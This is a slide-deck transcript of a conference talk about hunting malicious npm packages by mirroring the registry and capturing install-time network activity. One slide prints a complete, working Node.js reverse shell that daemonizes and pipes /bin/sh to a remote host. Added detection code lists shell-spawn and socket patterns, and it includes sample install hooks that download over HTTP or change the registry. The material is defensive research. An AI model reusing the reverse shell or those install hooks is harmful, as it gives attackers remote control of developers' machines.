Hunting for malicious modules in npm - NodeSummit
adam-baldwin
![Page 1: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/1.jpg)
Hunting for Malicious Modules in
![Page 2: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/2.jpg)
adam_baldwin evilpacket
![Page 3: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/3.jpg)
liftsecurity.io
![Page 4: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/4.jpg)
nodesecurity.io
Continuous Security Monitoring
![Page 5: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/5.jpg)
Hunting for Malicious Modules in
![Page 6: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/6.jpg)
WHY SHOULD WE HUNT?
![Page 7: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/7.jpg)
🕯Hey, I can publish malicious code to npm
![Page 8: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/8.jpg)
💨this is bad.
![Page 9: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/9.jpg)
🔥install scripts are BAD!
![Page 10: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/10.jpg)
💩JavaScript BAD!
![Page 11: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/11.jpg)
rimrafall
![Page 12: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/12.jpg)
npm hydra worm
![Page 13: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/13.jpg)
WHAT ARE WE HUNTING?
![Page 14: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/14.jpg)
WHAT DEFINES MALICIOUS BEHAVIOR?
![Page 15: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/15.jpg)
```javascript
var net = require('net');
var daemon = require('daemon');
var spawn = require('child_process').spawn;

function c() {
  var client = new net.Socket();
  client.connect(443, "REDACTED", function() {
    var sh = spawn('/bin/sh', []);
    client.write("Connected\r\n");
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
  });

  client.on('error', function() {});

  client.on('close', function() {
    setTimeout(c, 5000);
  });
}

require('daemon')();
c();
```
😈Example
![Page 16: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/16.jpg)
client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []);
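The two highlighted calls (an outbound socket paired with a spawned shell) can be hunted for statically. The following is an added example, not code from the talk: the indicator names, the `scanSource` function and both sample files are assumptions constructed for illustration, and the regexes are a coarse triage heuristic rather than a parser.

```javascript
// Added example: static heuristic for the "socket + shell" pairing.
// Strip comments so commented-out code does not trigger a match.
// Naive: the [^:] guard only avoids eating "http://" style URLs.
function stripComments(src) {
  return src
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/(^|[^:])\/\/.*$/gm, '$1');
}

const INDICATORS = {
  usesNet: /require\(\s*['"](?:net|tls)['"]\s*\)/,
  usesChildProcess: /require\(\s*['"]child_process['"]\s*\)/,
  spawnsShell: /\b(?:spawn|exec|execFile)\w*\(\s*['"](?:\/bin\/(?:ba|z|da)?sh|cmd(?:\.exe)?)['"]/,
  outboundConnect: /\.connect\(\s*\d+\s*,/,
  pipesToStdin: /\.pipe\(\s*\w+\.stdin\s*\)/,
  daemonizes: /require\(\s*['"]daemon['"]\s*\)/,
};

function scanSource(src) {
  const code = stripComments(src);
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(code));
  const has = (k) => hits.includes(k);
  // A single indicator is common in benign code; the combination is the signal.
  const suspicious = has('usesNet') && has('usesChildProcess') &&
    has('spawnsShell') && (has('outboundConnect') || has('pipesToStdin'));
  return { suspicious, hits };
}

// Constructed sample: the pattern highlighted on the slide.
const SAMPLE_SHELL = [
  "var net = require('net');",
  "var spawn = require('child_process').spawn;",
  "var client = new net.Socket();",
  "client.connect(443, 'REDACTED', function () {",
  "  var sh = spawn('/bin/sh', []);",
  "  client.pipe(sh.stdin);",
  "});",
].join('\n');

// Constructed sample: benign build helper with a commented-out shell spawn.
const SAMPLE_BUILD = [
  "var exec = require('child_process').exec;",
  "var net = require('net');",
  "// spawn('/bin/sh', []) was removed in an earlier version",
  "exec('node-gyp rebuild', function () {});",
  "net.createServer().listen(8080);",
].join('\n');

console.log(scanSource(SAMPLE_SHELL), scanSource(SAMPLE_BUILD));
```
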
![Page 17: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/17.jpg)
WHERE ARE WE HUNTING?
![Page 18: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/18.jpg)
![Page 19: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/19.jpg)
507,573 modules
![Page 20: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/20.jpg)
3,443,784 individual versions
![Page 21: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/21.jpg)
242,505,822 individual files
![Page 22: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/22.jpg)
21,756 modules with install scripts
![Page 23: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/23.jpg)
HOW AM I HUNTING?
![Page 24: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/24.jpg)
MIRROR REGISTRY
![Page 25: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/25.jpg)
INDEX MODULES
Filenames, Extensions, Content Hash
![Page 26: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/26.jpg)
npm install module
syscall capture
DB
![Page 27: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/27.jpg)
npm publish, GCS
PubSub, Instrumentation
npm i, raw data 🎉
![Page 28: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/28.jpg)
~24,000 modules processed
![Page 29: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/29.jpg)
2.1 TB OF DATA 😲
![Page 30: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/30.jpg)
DESTINATION PORTS
22, 53, 80, 443, 1880, 3000, 3001, 3306, 4987, 6379, 8000, 8002, 8008, 8043, 8080, 8090, 9000, 9001, 9418, 23400, 27017, 38584, 54329, 61337
![Page 31: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/31.jpg)
DNS REQUESTS
339 unique lookups
![Page 32: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/32.jpg)
DESTINATION HOSTS
1080 unique hosts
![Page 33: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/33.jpg)
RESULTS 😈
![Page 34: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/34.jpg)
Insecure Behavior
144+ modules that download build components over HTTP
![Page 35: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/35.jpg)
![Page 36: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/36.jpg)
Modules that called home
et_phone_home, anarchy, harmlesspackage, botbait
![Page 37: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/37.jpg)
Modules that change registry settings
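Install scripts, plain-HTTP build downloads and registry changes can all be triaged from the manifest before anything is installed. The following is an added example, not the tooling used in the talk: the check ids, function names and sample manifests are assumptions constructed for illustration.

```javascript
// Added example: triage install-time hooks in package.json manifests.
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristic checks, one per finding category named on the slides.
const CHECKS = [
  { id: 'http-download', re: /\bhttp:\/\/[^\s"']+/i },
  { id: 'registry-change', re: /\bnpm\s+(?:config\s+)?set\s+registry\b/i },
];

// Return one finding per install hook; `hits` lists the checks that matched.
function triageManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const hits = CHECKS.filter((c) => c.re.test(cmd)).map((c) => c.id);
    findings.push({ name: manifest.name, hook, cmd, hits });
  }
  return findings;
}

function triageAll(manifests) {
  return manifests.flatMap(triageManifest);
}

// Constructed sample manifests (hypothetical names, not real packages).
const SAMPLE_MANIFESTS = [
  { name: 'example-native-addon',
    scripts: { install: 'node-gyp rebuild', test: 'mocha' } },
  { name: 'example-http-fetch',
    scripts: { postinstall: 'curl http://downloads.example.invalid/lib.tgz -o lib.tgz' } },
  { name: 'example-registry',
    scripts: { preinstall: 'npm config set registry http://registry.example.invalid/' } },
  { name: 'example-no-hooks',
    scripts: { test: 'node test.js' } },
];

for (const f of triageAll(SAMPLE_MANIFESTS)) {
  // A hook with no hits still runs code at install time and needs manual review.
  console.log(`${f.name} [${f.hook}] ${f.hits.join(',') || 'manual review'}`);
}
```
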
![Page 38: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/38.jpg)
😇 ? 😈
![Page 39: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/39.jpg)
😢 / 😀
![Page 40: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/40.jpg)
WHAT DID I LEARN?
How can we improve the future
![Page 41: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/41.jpg)
People will publish malicious things to the registry
![Page 42: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/42.jpg)
Your security habits have a lot to do with whether this gets exploited
![Page 43: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/43.jpg)
- Have good passwords
- Don't publish credentials
- Limit the # of publishers
![Page 44: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/44.jpg)
But what about ? Can't they do something?
![Page 45: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/45.jpg)
</presentation>
Thanks
adam_baldwin evilpacket